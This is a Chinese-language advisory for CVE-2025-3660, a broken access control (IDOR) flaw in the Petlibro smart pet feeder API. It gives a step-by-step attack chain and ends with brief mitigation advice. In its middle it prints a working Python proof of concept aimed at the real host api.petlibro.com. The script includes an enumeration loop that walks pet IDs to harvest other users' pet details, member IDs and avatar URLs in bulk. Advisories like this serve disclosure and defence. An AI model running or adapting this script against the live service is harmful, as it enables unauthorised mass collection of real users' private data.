CVE-2025-3660 Petlibro智能宠物喂食器平台访问控制失效漏洞

漏洞信息

漏洞编号

CVE-2025-3660

漏洞类型

访问控制失效 (Broken Access Control)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Petlibro Smart Pet Feeder Platform

漏洞概述

CVE-2025-3660是存在于Petlibro智能宠物喂食器平台中的一个中等严重性访问控制安全漏洞。该漏洞存在于1.7.31及之前版本中，由于系统缺少对用户资源所有权的验证机制，导致已认证用户可以通过API接口访问其他用户的宠物数据。攻击者只需构造带有任意宠物ID的请求，即可无需授权获取敏感信息，包括宠物详细信息、关联的会员ID以及头像URL等。Petlibro作为一款广受欢迎的智能宠物喂食器产品，其移动应用和后端API服务均存在此安全缺陷。由于该漏洞可通过网络远程利用，且无需特殊权限即可发起攻击，因此对用户隐私数据安全构成严重威胁。攻击者利用此漏洞可大规模收集用户和宠物的敏感信息，用于后续的精准诈骗或其他恶意活动。

技术细节

漏洞根源在于Petlibro后端API在处理/member/pet/detailV2接口请求时，未正确验证当前登录用户与请求的宠物ID之间的所有权关系。正常业务流程中，用户应只能访问自己名下的宠物数据，但后端服务仅检查了用户是否已登录（Authentication），而未进行授权检查（Authorization）。攻击者可通过以下方式利用：1) 使用有效账号登录Petlibro应用或API；2) 拦截正常请求获取API端点格式；3) 修改请求中的pet_id参数为任意目标宠物ID；4) 发送构造后的请求到/member/pet/detailV2端点；5) 服务器返回目标宠物的完整信息而无需验证请求者权限。此类漏洞属于典型的IDOR（Insecure Direct Object Reference）问题，攻击者可利用自动化脚本遍历猜测有效的宠物ID，从而批量获取平台用户数据。

攻击链分析

STEP 1

步骤1

攻击者注册并登录Petlibro应用，获取有效的认证令牌（Authentication Token）

STEP 2

步骤2

使用Burp Suite或其他抓包工具拦截正常查询宠物信息的请求，分析API端点格式

STEP 3

步骤3

识别漏洞端点 /member/pet/detailV2，该接口通过petId参数接收宠物ID

STEP 4

步骤4

构造恶意请求，将petId参数修改为目标用户关联的任意宠物ID

STEP 5

步骤5

发送构造后的请求，服务器因缺少所有权验证而返回目标宠物的完整数据

STEP 6

步骤6

利用自动化脚本遍历猜测有效petId，大规模窃取平台用户和宠物敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-3660 PoC - Petlibro Smart Pet Feeder Broken Access Control
# Target: /member/pet/detailV2 endpoint

BASE_URL = "https://api.petlibro.com"
TARGET_ENDPOINT = "/member/pet/detailV2"

def exploit_cve_2025_3660(auth_token, target_pet_id):
    """
    Exploit for CVE-2025-3660: Broken Access Control in Petlibro Platform
    Allows authenticated users to access other users' pet data via pet ID manipulation
    
    Args:
        auth_token: Valid authentication token from Petlibro account
        target_pet_id: Arbitrary pet ID to retrieve data for
    Returns:
        JSON response containing pet details
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json",
        "User-Agent": "Petlibro/1.7.31 (Android)"
    }
    
    params = {
        "petId": target_pet_id
    }
    
    url = f"{BASE_URL}{TARGET_ENDPOINT}"
    
    try:
        response = requests.get(url, headers=headers, params=params, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Success! Retrieved pet data for ID: {target_pet_id}")
            print(f"[+] Response: {json.dumps(data, indent=2)}")
            return data
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def enumerate_pet_ids(auth_token, start_id=1, end_id=1000):
    """
    Enumerate and collect pet data by iterating through pet IDs
    """
    collected_data = []
    
    for pet_id in range(start_id, end_id + 1):
        data = exploit_cve_2025_3660(auth_token, str(pet_id))
        if data and data.get('code') == 200:
            collected_data.append({
                'pet_id': pet_id,
                'data': data.get('data')
            })
            print(f"[+] Collected data for pet ID: {pet_id}")
    
    return collected_data

if __name__ == "__main__":
    # Replace with actual auth token and target pet ID
    AUTH_TOKEN = "your_auth_token_here"
    TARGET_PET_ID = "12345"
    
    print("CVE-2025-3660 Exploitation Test")
    print("=" * 50)
    exploit_cve_2025_3660(AUTH_TOKEN, TARGET_PET_ID)

影响范围

Petlibro Smart Pet Feeder Platform <= 1.7.31

防御指南

临时缓解措施

目前官方已发布更新版本，建议用户立即升级Petlibro应用至最新版本。临时缓解措施包括：限制API接口的访问频率，防止攻击者自动化遍历petId；监控异常的数据访问日志，及时发现可疑活动；在应用层面增加数据访问审计功能，记录所有宠物数据的查询操作以便安全审计。